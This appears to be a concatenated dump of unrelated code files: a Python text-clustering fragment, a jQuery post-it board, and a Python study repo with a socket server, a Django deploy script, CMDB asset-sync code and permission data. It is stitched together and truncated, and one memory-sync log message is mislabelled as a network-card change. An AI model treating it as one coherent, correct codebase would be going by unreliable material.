totalvocab_tokenized}, index = totalvocab_stemmed) print 
('there are ' + str(vocab_frame.shape[0]) + ' items in vocab_frame') print (vocab_frame.head()) #define vectorizer parameters tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000, min_df=0.2, stop_words='english', use_idf=True, tokenizer=tokenize_and_stem, ngram_range=(1,3)) tfidf_matrix = tfidf_vectorizer.fit_transform(synopses) #fit the vectorizer to synopses print(tfidf_matrix.shape) terms = tfidf_vectorizer.get_feature_names() dist = 1 - cosine_similarity(tfidf_matrix) num_clusters = 5 km = KMeans(n_clusters=num_clusters) km.fit(tfidf_matrix) clusters = km.labels_.tolist() print(km) joblib.dump(km, 'doc_cluster.pkl') km = joblib.load('doc_cluster.pkl') clusters = km.labels_.tolist() titles=[] titles = [line.rstrip('\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')] ranks = [line for line in range(1,101)] genres=[] genres = [line.rstrip('\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')] films = { 'title': titles, 'rank': ranks, 'synopsis': synopses, 'cluster': clusters, 'genre': genres } frame = pd.DataFrame(films, index = [clusters] , columns = ['rank', 'title', 'cluster', 'genre']) frame['cluster'].value_counts() #number of films per cluster (clusters from 0 to 4) print(frame['cluster'].value_counts()) #number of films per cluster (clusters from 0 to 4) grouped = frame['rank'].groupby(frame['cluster']) #groupby cluster for aggregation purposes grouped.mean() #average rank (1 to 100) per cluster print (grouped.mean()) print("Top terms per cluster:") print() #sort cluster centers by proximity to centroid order_centroids = km.cluster_centers_.argsort()[:, ::-1] for i in range(num_clusters): print("Cluster %d words:" % i, end='') for ind in order_centroids[i, :6]: #replace 6 with n words per cluster print(' %s' % vocab_frame.ix[terms[ind].split(' ')].values.tolist()[0][0].encode('utf-8', 'ignore'), end=',') print() #add whitespace print() #add whitespace print("Cluster %d titles:" % i, 
end='') for title in frame.ix[i]['title'].values.tolist(): print(' %s,' % title, end='') print() #add whitespace print() #add whitespace print() print()
be2d8d9434510a0fcee24d9548cf395025693e51
[ "Python", "Shell" ]
5
Shell
UDIC-lab-NCHU/hsiang_project
be580952d4a4a408c82ca2e60cab076f4111594c
666bebc56909346b950a3b192875f18e8e8b952d
refs/heads/master
<file_sep>////////////////////////////////////////////////////////////////// //BOARD ////////////////////////////////////////////////////////////////// var Board = function( selector ) { var self = this; var boardList = new List(); function initialize() { self.$elem = $( selector ); self.$elem.dblclick(function(a) { x = a.pageX + "px"; y = a.pageY + "px"; if (a.target == this) { self.addPostIt(x, y); }; }); self.deletePostIt(); }; initialize(); }; Board.prototype.addPostIt = function(x, y){ var postIt = new PostIt(); postIt.$elem.css({ "position": "absolute", "left": x, "top": y, "z-index": ++PostIt.zIndex }); // self.boardList.push(postIt.$elem); this.$elem.append(postIt.$elem); }; Board.prototype.deletePostIt = function(){ var self = this; this.$elem.on("click",".close", function(){ $(this).parent().parent().remove(); }); }; ////////////////////////////////////////////////////////////////// //POST IT ////////////////////////////////////////////////////////////////// var PostIt = function() { var self = this; string = "<div class='post-it'><div class='header'><div class='close'>X</div></div><div class='content' contentEditable='true'></div></div>"; function initialize () { self.$elem = $(string); self.moveToFront(); self.$elem.draggable({ handle: "div.header" }); }; initialize(); }; PostIt.prototype.stopPropagation = function(){ $(".post-it").on("dblclick", function(event){ event.stopPropagation(); }); } PostIt.prototype.moveToFront = function(){ this.$elem.on("mousedown", function(event){ $(this).css({ "z-index": ++PostIt.zIndex }); }); } PostIt.zIndex = 0; //////////////////////////////////////////////////////////////////// //LIST //////////////////////////////////////////////////////////////////// var List = function(){ //selector var self = this; function initialize(){ self.array = new Array(); // self.element = $(selector); }; initialize(); }; List.prototype.select = function(){ $("li").on("click", function(){ alert("dimos click"); }); } 
//////////////////////////////////////////////////////////////////// $(function() { // Esta es la función que correrá cuando este listo el DOM // var zindex = 0; // $(".post-it").on("click", function(){ // console.log("entramos"); // $(this).style.zIndex = ++zindex; // }); $("#new_board").on("click", function(){ var boardName = prompt("Name of the board:"); $("#boards").append("<li class='lista'>" + boardName + "</li>"); var list = new List(); list.select(); // $(".list-end").before("<p class='list'>" + boardName + "</p>"); var board = new Board("#board"); }); });
f3d203768122f6c8b498d7475dc214664211abf8
[ "JavaScript" ]
1
JavaScript
sabefo/JS-PostIt
16df9f764e49efaa9f4e846b8d9eb911bd5e5b07
ba6ec0fabaa018e006cc6ce0db010918a6f6e55c
refs/heads/master
<repo_name>huningfei/python<file_sep>/day16/01 简版socketserver.py import socket sk = socket.socket() sk.bind(('127.0.0.1', 8080)) sk.listen() while 1: conn, addr = sk.accept() # 接收消息 data = conn.recv(8000) print(data) # 回复消息 # 按照约定好的格式回复消息 conn.send(b'http/1.1 200 ok\r\n\r\no98k') conn.close() <file_sep>/deploy/script/put_script.py #!/usr/bin/env python # -*- coding:utf-8 -*- """ 1. 解压缩 2. 软连接 3. 杀掉原进程 4. 启动程序 """ import os import sys import shutil from subprocess import check_output, check_call, CalledProcessError from zipfile import ZipFile CODE_BASE_PATH = "/data/deploy/codes/" WEB_BASE_PATH = "/data/web_root" def unpack_zipfile(project_name, version, file_name): """ 解压文件 例如: /data/deploy/codes/dbhot/v1/dbhot20181207030727.zip /data/deploy/codes/dbhot/v1/dbhot20181207030727 类似于: unzip -d /data/codes/dbhot/v1/dbhot20181207030727 /data/codes/dbhot/v1/dbhot20181207030727.zip :return: """ zip_file_path = os.path.join(CODE_BASE_PATH, project_name, version, file_name) web_file_path = os.path.join(CODE_BASE_PATH, project_name, version, file_name.split('.')[0]) tar = ZipFile(zip_file_path, 'r') tar.extractall(path=web_file_path) tar.close() return web_file_path def link(web_file_path, project_name): """ 软链接 :return: """ if not os.path.exists(WEB_BASE_PATH): os.makedirs(WEB_BASE_PATH) link_path = os.path.join(WEB_BASE_PATH, project_name) if os.path.exists(link_path): os.remove(link_path) os.symlink(web_file_path, link_path) return link_path def kill_origin_process(match_key): """ 获取指定进程PID :param name: :return: """ check_command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' " % (match_key) check_status = check_output(check_command, shell=True) if check_status: command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' | xargs kill -9" % (match_key) check_call(command, shell=True) def start_service(project_name, start_command): """ 启动服务 :return: """ command = "%s >/dev/null 2>&1 & " % (start_command,) web_file_path = os.path.join(WEB_BASE_PATH, project_name) # 
启动 check_call(command, shell=True, cwd=web_file_path) return True def run(): project_name = sys.argv[1] version = sys.argv[2] file_name = sys.argv[3] web_file_path = unpack_zipfile(project_name, version, file_name) link_path = link(web_file_path, project_name) kill_status = kill_origin_process('python3 manage.py runserver 0.0.0.0:8001') start_status = start_service(project_name, 'python3 manage.py runserver 0.0.0.0:8001') if __name__ == '__main__': run()<file_sep>/复习/深浅copy和小数据池.py #浅copy # 对于浅copy来说,第一层创建的是新的内存地址,而从第二层开始,指向的都是同一个内存地址,所以,对于第二层以及更深的层数来说, # 保持一致性。 # l1 = [1,2,3,['barry','alex']] # l2=l1.copy() # # print(l2) # print(l1,id(l1)) #[1, 2, 3, ['barry', 'alex']] 2916415390600 # print(l2,id(l2)) #[1, 2, 3, ['barry', 'alex']] 2916416395912 # l1[1]=222 # print(l1,id(l1))#[1, 222, 3, ['barry', 'alex']] 2916415390600 l1的值改变了,而l2的值没有变 # print(l2,id(l2)) #[1, 2, 3, ['barry', 'alex']] 2916416395912 # l1[3][0]='wusir' #l1和l2的值是一样的。 # print(l1,id(l1[3]))#[1, 2, 3, ['wusir', 'alex']] 2654134573768 # print(l2,id(l2[3]))#[1, 2, 3, ['wusir', 'alex']] 2654134573768 #深拷贝deepcopy # 对于深copy来说,两个是完全独立的,改变任意一个的任何元素(无论多少层),另一个绝对不改变。 # import copy # l1 = [1,2,3,['barry','alex']] # l2 = copy.deepcopy(l1) # print(l1,id(l1)) # print(l2,id(l2)) # l1[1]=222 # print(l1,id(l1)) # print(l2,id(l2)) # l1[3][0] = 'wusir' # print(l1,id(l1[3])) # print(l2,id(l2[3])) #小数据池 #python中 有小数据池的概念。 # int -5 ~256 的相同的数全都指向一个内存地址,节省空间。 # str:s = 'a' * 20 以内都是同一个内存地址 a=5 b=5 print(type(a)) print(id(a))#1406758496 print(id(b))#1406758496 print(a is b ) user1='12' user2='12' print(id(user1)) #2675065969552 print(id(user2))#2675065969552 <file_sep>/day23/auto - 2 - 固定二级菜单示例/web/urls.py from django.conf.urls import url, include from web.views import home urlpatterns = [ url(r'^add_user/', home.add_user), url(r'^info/', home.info), url(r'^del_user/(\d+)/$', home.del_user), url(r'^edit_user/(\d+)/$', home.edit_user), url(r'^user/', home.userlist), url(r'^add_order/', home.add_order), url(r'^orderlist/', 
home.orderlist), url(r'^orderinfo/', home.orderinfo), url(r'^del_order/(\d+)/$', home.del_order), url(r'^edit_order/(\d+)/$', home.edit_order), ] <file_sep>/day8/粘包/server.py import socket sk=socket.socket() sk.bind(('127.0.0.1',8080)) sk.listen() conn,addr=sk.accept() data1=conn.recv(10) data2=conn.recv(10) print(data1.decode('utf-8')) print(data2.decode('utf-8')) conn.close() sk.close() <file_sep>/day4/优秀的作业/优秀的作业/孙鹏飞/day4作业/staff_manager.py #!/usr/bin/env python3 # day4博客地址:http://www.cnblogs.com/spf21/p/8919716.html from tabulate import tabulate import os user_status = {"user": None, "status": False} FILE_PATH = "./file/" TABLE_PATH = "./table/" TABLE = "%suser_info" % TABLE_PATH USER_FILE = "%suser_list" % FILE_PATH readme = "%shelp_file" % FILE_PATH def mysql_help(): """ 帮助文档 :return: """ with open(readme, mode="r", encoding="utf-8") as f1: print("*" * 100) for i in f1: print(i, end="") print("\n" + "*" * 100) def print_log(meg, type_info="error"): """ 修改输出颜色 :param meg: :param type_info: :return: """ if type_info == "info": print("\033[32;0m%s\033[0m" % meg) elif type_info == "error": print("\033[31;0m%s\033[0m" % meg) def table_list(path): """ 获取所有的表 :param path: :return: """ for root, dirs, files in os.walk(path): return files def show_tables(): """ 查看所有的表 :return: """ for i in T_LIST: print_log(i) def wrapper(main_func): """ 登录装饰器 :param main_func: :return: """ def inner(*args, **kwargs): if user_status["user"] and user_status["status"]: result = main_func(*args, **kwargs) if result != None: return result else: str_func = "%s " % (main_func,) if "blog_exit" in str_func: print_log("Bye Bye!!!".center(40, "-"), "error") exit() if "log_out" in str_func: print_log("用户未登录!!!", "error") exit() print(">>>欢迎登录MySQL:") count = 0 while count < 3: username = input("请输入用户名:").strip() password = input("请输入密码:").strip() if not username or not password: print_log("用户名或密码不能为空", "error") with open(USER_FILE) as f1: for i in f1: user, passwd = i.split() if username == user 
and password == passwd: print_log("登录成功!欢迎:<%s>" % (username,)) user_status["user"] = username user_status["status"] = True main_func() else: print_log("用户名或者密码错误,请重试!") count += 1 else: exit() return inner def local_table(t_file): """ 把文件转换成字典类型 {'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'nezha'], 'age': ['22', '23', '25'], 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT', 'Tearcher', 'IT']} :param t_file: :return: """ n = 1 table_dic = {} line_info_tmp = [] with open(t_file) as f1: for line in f1: line = line.strip() # global line_title # 生命一个全局变量 if n == 1: global line_title # 生命一个全局变量 line_title = line.split(",") else: global line_info line_info = line.split(",") line_info_tmp.append(line_info) n += 1 count = 0 for i_title in line_title: # line_title = [id,name,age,phone,job] table_dic[i_title] = [] for i_info in line_info_tmp: # line_info_tmp = [[1,alex,22,185422342342,it], [2,spf,22,185422342342,it]] table_dic[i_title].append(i_info[count]) count += 1 # print(table_dic) return table_dic def local_file(argv): """ 把修改后的字典写入到文件中 :param arv: = 修改后的Table_DATA {'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'nezha'], 'age': ['22', '23', '25'], 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT', 'Tearcher', 'IT']} :return: """ # ['1', '2', '3'] ['Alex', 'Egon', 'nezha'] ['22', '23', '25'] # [1,alex,22] # 1,alex,22 # 把字典转换成列表,在转成字符串写入到新的表文件,删除旧表文件,重命名新文件为旧文件 with open("info.bak", mode="a", encoding="utf-8") as f1: title = ",".join(line_title) # 获取title转换成字符串写入文件 f1.write(title + "\n") # li = [] # [['1', 'Alex', '22', '13651054608', 'linux'], ['2', 'Egon', '23', '13304320533', 'Tearcher'], ['3', 'nezha', '25', '1333235322', 'linux']] # for i in range(len(argv["id"])): # li_tmp = [] # li1 = ['1', 'Alex', '22', '13651054608', 'IT'] # for f in line_title: # li_tmp.append(argv[f][i]) # li.append(li_tmp) li = zip(*argv.values()) for i in li: info = ",".join(i) f1.write(info + "\n") os.remove(TABLE) os.rename("info.bak", TABLE) def 
syntax_select(where_data, query_section): """ 把where返回的结果根据字段打印出来 :param where_data: [['2', 'Egon', '23', '13304320533', 'Tearcher'], ['3', 'nezha', '25', '1333235322', 'IT']] :param query_section: # select name,age from info select * from info :return: """ fields_tmp = query_section.split("from")[0].split("select")[1].split(",") # 切割 query_section 成列表["age","name"] fields = [i.strip() for i in fields_tmp] # 去掉关键字的空格 for t_name in T_LIST: if t_name in query_section: if "*" in fields: fields = line_title res_li = [] # 用于存储匹配到的字段内容 每条记录以列表方式存储 res_li = [[23 ,Egon] ,[34,alex]] try: for i in where_data: # 循环 where查的数据 ['2', 'Egon', '23', '13304320533', 'Tearcher'] ['3', 'nezha', '25', '1333235322', 'IT']] li = [] # 存储字段对应的单条数据 li = [23,] --> li = [23 ,Egon] age:li = [alex,22] name = [Egon,34] for k in fields: # k = "age" k = "name" fields = [age,name] try: # i = ['2', 'Egon', '23', '13304320533', 'Tearcher'] index = line_title.index(k) # 返回字段对应的索引 # line_title = [id ,name, age ,phone,job] # age = 2 # name = 1 li.append(i[index]) # 添加字段对应的数据到列表 i = ['2', 'Egon', '23', '13304320533', 'Tearcher'] except ValueError: print_log("语法错误:%s列不存在!" % k) return res_li.append(li) print(tabulate(res_li, headers=fields, tablefmt="grid")) print_log("查到了%s行!" 
% len(where_data), "info") return except TypeError: print_log("语法错误:where没有跟条件", where_data) return else: print_log("语法错误:表不存在") return def syntax_insert(where_data, query_section): """ 插入 :param where_data: :param query_section: insert into info values(3,nezha,25,1333235322,IT); :return: """ if "values" in query_section: res_tmp = query_section.split("values")[1].split(",") res = [i.strip("()").strip() for i in res_tmp] if res[0].isdigit(): res[0] = str(int(Table_DATA["id"][-1]) + 1) res_w = ",".join(res) if len(res) != len(line_title): print_log("语法错误:需要%s个参数,你给了%s个" % (len(line_title), len(res)), "error") return else: if res[0] in Table_DATA["id"]: print_log("语法错误:ID重复", "error") else: if res[3] in Table_DATA["phone"]: print_log("语法错误:手机号重复") else: with open(TABLE, mode="a") as f1: f1.write(res_w + "\n") else: print_log("语法错误:缺少values") return def syntax_update(where_data, query_section): """ 更新 :param where_data: = [['2', 'Egon', '23', '13304320533', 'Tearcher'], ['3', 'Egon', '23', '13304320533', 'Tearcher']] :param query_section: = update info set age = 25 :return: """ # 根据 where_data 的id获取Table_DATA["id"]的索引,在根据索引去Table_DATA[字段]修改值 if "set" in query_section and "=" in query_section: # 判断语法是否有set res_tmp = query_section.split("set")[1].split("=") # 取出需要修改的字段和值 res = [i.strip() for i in res_tmp] # 去掉空格res = ["age", "25"] if where_data == None: print_log("语法错误:where语法有错,示例:where age > 23") return for line in where_data: # ['2', 'Egon', '23', '13304320533', 'Tearcher'] line_id = line[0] # 获取匹配到内容的ID # line_id = 2 index = Table_DATA["id"].index(line_id) # index = id 在 Table_DATA表id列的索引 index = 1 Table_DATA[res[0]][index] = res[1] # Table_DATA[res["age"]] = [22,23,30] print_log("影响了%s行!" 
% len(where_data), "info") return Table_DATA else: print_log("语法错误:缺少set或者 = ", "error") return # print(where_data) def syntax_delete(where_data, query_section): """ 根据where条件删除匹配行 :param where_data: = [['1', 'Alex', '22', '13651054608', 'IT'], ['3', 'nezha', '25', '1333235322', 'IT']] :param query_section: delete from info :return: """ if "from" in query_section: # 判断语法是否有from if where_data == None: print_log("语法错误:where语法错误,示例:where age > 23") return for line in where_data: line_id = line[0] # 获取匹配到内容的ID index = Table_DATA["id"].index(line_id) # index = id 在 Table_DATA表id列的索引 for dic_line in Table_DATA: # 删除获取到的索引对应多有值 Table_DATA[dic_line].pop(index) print_log("影响了%s行!" % len(where_data), "info") return Table_DATA else: print_log("语法错误:from", "error") return def op_gt(argv_fields, argv_value): """ 大于判断: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] # 空列表接受所有匹配到的参数 for index, value in enumerate(Table_DATA[argv_fields]): # 循环列表进行匹配,index记录匹配元素的索引 try: if float(value) > float(argv_value): # 匹配参数 l1 = [] # 空列表接受匹配到的单行 for key in Table_DATA.keys(): # 循环用户表获取匹配到的完整行 l1.append(Table_DATA[key][index]) # 根据索引匹配 并把匹配到的行添加到小列表中 data_res.append(l1) # 匹配到的行将以列表数据类型的存在data_res中 except ValueError: print_log("语法错误:字符串类型错误") return return data_res def op_lt(argv_fields, argv_value): """ 小于判断: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] for index, value in enumerate(Table_DATA[argv_fields]): if float(value) < float(argv_value): l1 = [] for key in Table_DATA.keys(): l1.append(Table_DATA[key][index]) data_res.append(l1) return data_res def op_eq(argv_fields, argv_value): """ 等于判断: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] for index, value in enumerate(Table_DATA[argv_fields]): if value == argv_value: l1 = [] for key in Table_DATA.keys(): l1.append(Table_DATA[key][index]) data_res.append(l1) return data_res def 
op_like(argv_fields, argv_value): """ 模糊匹配: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] for index, value in enumerate(Table_DATA[argv_fields]): if argv_value in value: l1 = [] for key in Table_DATA.keys(): l1.append(Table_DATA[key][index]) data_res.append(l1) return data_res def where_parser(section): """ where条件解析 :param section: 条件: age > 22 :return: """ choice = { ">": op_gt, "<": op_lt, "=": op_eq, "like": op_like } for choice_key, func in choice.items(): # 第一次进来 choice_key = ">" func = op_gt if choice_key in section: # 第一次进来 ">" in age > 22 fields, value = section.split(choice_key) # fields = age value = 22 if fields.strip() in line_title: # fields.strip() 去掉空格 line_title = [id,name,age,job] where_data = func(fields.strip(), value.strip()) # 执行对应的where判断,返回判断结果 return where_data # 返回给语法解析器 else: print_log("语法错误:%s字段不存在" % fields) return else: print_log("语法错误:缺少条件%s" % choice.keys(), "error") return def syntax_parser(cmd): """ 语法分析器 :param cmd: 语法:select name,age from info where age > 22 :return: """ choice_action = { "select": syntax_select, "insert": syntax_insert, "update": syntax_update, "delete": syntax_delete, "show": show_tables } cmd = cmd.strip() actions = ["select", "insert", "update", "delete", "show"] if cmd.split()[0] in actions: # 判断用户输入的语法是否正确(["select", "insert", "update", "delete"]) if "where" in cmd: query_section, where_section = cmd.split("where") # 根据where关键件把用户输入的命令切割成两部分,前半部分是增删改查方法,后半部分是where条件 where_data = where_parser(where_section) # 把where条件交给where函数进行解析判断,并返回解析判断值 func_res = choice_action[query_section.split()[0]](where_data, query_section) # 讲where_data返回的结果交给执行增删改成函数 if func_res != None: local_file(func_res) # func_res 等于修改后的TABLE_DATA else: query_section = cmd # query_section 默认值等于cmd where_section = "id > 0" # 条件默认为id > 0 where_data = where_parser(where_section) # 把where条件交给where函数进行分配判断 action = query_section.split()[0] # action = select ... 
if action == "show": show_tables() return if action == "update" or action == "delete": print_log("语法错误:修改或删除缺少where条件") return func_res = choice_action[action](where_data, query_section) # 执行增删改成函数 if func_res != None: local_file(func_res) # func_res 等于修改后的TABLE_DATA else: print_log("语法错误: %s" % actions, "error") return T_LIST = table_list(TABLE_PATH) Table_DATA = local_table(TABLE) @wrapper def main(): """ 主运行程序 :return: """ mysql_help() # 显示帮助 while True: global Table_DATA Table_DATA = local_table(TABLE) cmd = input("[info]>") if not cmd:continue syntax_parser(cmd) # 把sql语句交给语法分析器(syntax_parser)处理 if __name__ == "__main__": main() <file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/service.py #!/usr/bin/python # -*- coding:utf-8 -*- from api import models def process_basic(request,hostname): basic_dict = {} print(basic_dict) basic_dict.update(request.data['basic']['data']) basic_dict.update(request.data['cpu']['data']) basic_dict.update(request.data['board']['data']) models.Server.objects.filter(hostname=hostname).update(**basic_dict) def process_disk(request,server): # 1.1 获取数据库中的硬盘信息 disk_queryset = models.Disk.objects.filter(server=server) # 1.2 最新汇报来的硬盘信息 disk_info = request.data['disk']['data'] disk_queryset_set = {row.slot for row in disk_queryset} disk_info_set = set(disk_info) update_disk_slot_list = disk_info_set & disk_queryset_set add_disk_slot_list = disk_info_set - disk_queryset_set del_disk_slot_list = disk_queryset_set - disk_info_set # 更新 for slot in update_disk_slot_list: # models.Disk.objects.filter(slot=slot, server=server).update(**disk_info[slot]) obj = models.Disk.objects.filter(slot=slot, server=server).first() # 找出对应的服务器上面对应的序号 row_dict = disk_info[slot] # 代表客户端发送过来的硬盘数据 record_list = [] for name, new_value in row_dict.items(): old_value = str(getattr(obj, name)) #都是字符串互相比较 if old_value != new_value: setattr(obj, name, new_value) verbose_name = models.Disk._meta.get_field(name).verbose_name msg = "【硬盘变更】槽位%s:%s由%s变更为%s" % (slot, verbose_name, 
                      old_value, new_value)
                record_list.append(msg)
        # Persist any field changes, then write one combined change-log entry.
        obj.save()
        if record_list:
            models.AssetRecord.objects.create(server=server, content=';'.join(record_list))

    # Delete: disks present in the DB but absent from the latest report.
    models.Disk.objects.filter(server=server, slot__in=del_disk_slot_list).delete()
    if del_disk_slot_list:
        msg = "【硬盘变更】移除槽位%s上的硬盘" % (';'.join(del_disk_slot_list))
        models.AssetRecord.objects.create(server=server, content=msg)

    # Add: disks reported by the client but not yet stored in the DB.
    for slot in add_disk_slot_list:
        row_dict = disk_info[slot]
        row_record_list=[]
        for name, new_value in row_dict.items():
            verbose_name = models.Disk._meta.get_field(name).verbose_name
            tpl = "%s:%s" % (verbose_name, new_value,)  # describes one field of the newly added disk
            row_record_list.append(tpl)
        msg = "【硬盘变更】槽位%s新增硬盘,硬盘信息:%s" % (slot, ';'.join(row_record_list),)
        models.AssetRecord.objects.create(server=server, content=msg)
        row_dict['server'] = server
        models.Disk.objects.create(**row_dict)


def process_nic(request,server):
    """Synchronise the NIC rows of `server` with the client-reported data.

    Diffs the NICs stored in the DB (keyed by NIC name) against
    request.data['nic']['data']; updates changed NICs, deletes vanished
    ones and creates newly reported ones, logging every change as an
    AssetRecord row.

    :param request: DRF request whose .data carries the client report
    :param server: the Server model instance being updated
    """
    # 1.1 NIC info currently stored in the database
    nic_queryset = models.NIC.objects.filter(server=server)
    # 1.2 NIC info from the latest client report
    nic_info = request.data['nic']['data']

    nic_queryset_set = {row.name for row in nic_queryset}
    nic_info_set = set(nic_info)

    update_nic_slot_list = nic_info_set & nic_queryset_set  # present on both sides -> update
    add_nic_slot_list = nic_info_set - nic_queryset_set     # only in report -> create
    del_nic_slot_list = nic_queryset_set - nic_info_set     # only in DB -> delete

    # Update
    for nic_name in update_nic_slot_list:
        # models.NIC.objects.filter(name=name, server=server).update(**nic_info[name])
        obj = models.NIC.objects.filter(name=nic_name, server=server).first()
        row_dict = nic_info[nic_name]
        record_list = []
        for name, new_value in row_dict.items():
            # NOTE(review): unlike process_disk, old_value is NOT str()-converted
            # here, so type differences can register as changes — confirm intended.
            old_value = (getattr(obj, name))
            if old_value != new_value:
                setattr(obj, name, new_value)
                verbose_name = models.NIC._meta.get_field(name).verbose_name
                msg = "【网卡变更】网卡%s:%s由%s变更为%s" % (nic_name, verbose_name, old_value, new_value)
                record_list.append(msg)
        obj.save()
        if record_list:
            models.AssetRecord.objects.create(server=server, content=';'.join(record_list))

    # Delete
    # for nic_name in del_nic_slot_list:
    models.NIC.objects.filter(server=server,
                               name__in=del_nic_slot_list).delete()
    if del_nic_slot_list:
        msg = "【网卡变更】移除网卡%s" % (';'.join(del_nic_slot_list))
        models.AssetRecord.objects.create(server=server, content=msg)

    # Add: NICs reported by the client but not yet stored in the DB.
    for nic_name in add_nic_slot_list:
        row_dict = nic_info[nic_name]
        row_record_list = []
        for name, new_value in row_dict.items():
            verbose_name = models.NIC._meta.get_field(name).verbose_name
            tpl = "%s:%s" % (verbose_name, new_value,)
            row_record_list.append(tpl)
        msg = "【网卡变更】新增网卡%s,网卡信息:%s" % (nic_name, ';'.join(row_record_list),)
        models.AssetRecord.objects.create(server=server, content=msg)
        row_dict['server'] = server
        row_dict['name'] = nic_name
        models.NIC.objects.create(**row_dict)


def process_memory(request,server):
    """Synchronise the Memory rows of `server` with the client-reported data.

    Diffs the memory sticks stored in the DB (keyed by slot) against
    request.data['memory']['data']; updates changed sticks, deletes
    vanished ones and creates newly reported ones, logging every change
    as an AssetRecord row.

    :param request: DRF request whose .data carries the client report
    :param server: the Server model instance being updated
    """
    # 1.1 memory info currently stored in the database
    memory_queryset = models.Memory.objects.filter(server=server)
    # 1.2 memory info from the latest client report
    memory_info = request.data['memory']['data']

    memory_queryset_set = {row.slot for row in memory_queryset}
    memory_info_set = set(memory_info)

    update_memory_slot_list = memory_info_set & memory_queryset_set  # present on both sides -> update
    add_memory_slot_list = memory_info_set - memory_queryset_set     # only in report -> create
    del_memory_slot_list = memory_queryset_set - memory_info_set     # only in DB -> delete

    # Update
    for mem_name in update_memory_slot_list:
        # models.Memory.objects.filter(slot=slot, server=server).update(**memory_info[slot])
        obj = models.Memory.objects.filter(slot=mem_name, server=server).first()
        row_dict = memory_info[mem_name]
        record_list = []
        for name, new_value in row_dict.items():
            # old_value = str(getattr(obj, name))
            old_value = (getattr(obj, name))
            if old_value != new_value:
                setattr(obj, name, new_value)
                verbose_name = models.Memory._meta.get_field(name).verbose_name
                msg = "【内存变更】内存%s:%s由%s变更为%s" % (mem_name, verbose_name, old_value, new_value)
                record_list.append(msg)
        obj.save()
        if record_list:
            models.AssetRecord.objects.create(server=server, content=';'.join(record_list))

    # Delete: sticks present in the DB but absent from the latest report.
    models.Memory.objects.filter(server=server, slot__in=del_memory_slot_list).delete()
    if del_memory_slot_list:
        msg = "【内存变更】移除内存%s" % (';'.join(del_memory_slot_list))
models.AssetRecord.objects.create(server=server, content=msg) # 添加 for mem_name in add_memory_slot_list: row_dict = memory_info[mem_name] # 符合插槽名字的内存信息 row_record_list = [] for name, new_value in row_dict.items(): verbose_name = models.Memory._meta.get_field(name).verbose_name tpl = "%s:%s" % (verbose_name, new_value,) row_record_list.append(tpl) msg = "【网卡变更】新增网卡%s,网卡信息:%s" % (mem_name, ';'.join(row_record_list),) models.AssetRecord.objects.create(server=server, content=msg) row_dict['server'] = server models.Memory.objects.create(**row_dict)<file_sep>/day19/modelform/app01/forms.py from django import forms from django.core.validators import RegexValidator from django.core.exceptions import ValidationError from app01 import models class BookModelForm(forms.ModelForm): class Meta: model=models.Book fields="__all__" #model类里面所有的字段都展示 # fields="title" # 指定展示某些字段 # exclude=["title"] # 除了知道字段,其他字段都展示 # labels可以设置在网页上面显示的文字 labels={ "title":"书名", "publisher_date":"创建日期", "phone":"手机号", "publisher":"出版社", "authors":"作者", } widgets={ # 设置每个字段的插件信息 "title": forms.widgets.TextInput(attrs={"class": "form-control"}), "phone": forms.widgets.TextInput(attrs={"class": "form-control"}), "publisher": forms.widgets.Select(attrs={"class": "form-control"}), "authors": forms.widgets.SelectMultiple(attrs={"class": "form-control"}), } error_messages = { # 设置每个字段的报错提示信息 "publisher": { "required": "必须给我选一个出版社!" 
}, "authors":{ "required":"必须选择一个作者" } }<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/相关脚本/2.获取可以做菜单的权限信息.py permission_menu_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '添加用户', 'permissions__url': '/app01/user/add/', 'permissions__name': 'user_add', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '编辑用户', 'permissions__url': '/app01/user/edit/(\\d+)', 'permissions__name': 'user_edit', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None } ] permission_list = [] for item in permission_menu_list: menu_id = item['permissions__menu_id'] if menu_id: permission_list.append(item) print(permission_list) """ [ {'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None}, {'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None} ] """<file_sep>/day1/01 变量注释用户交互等.py # 
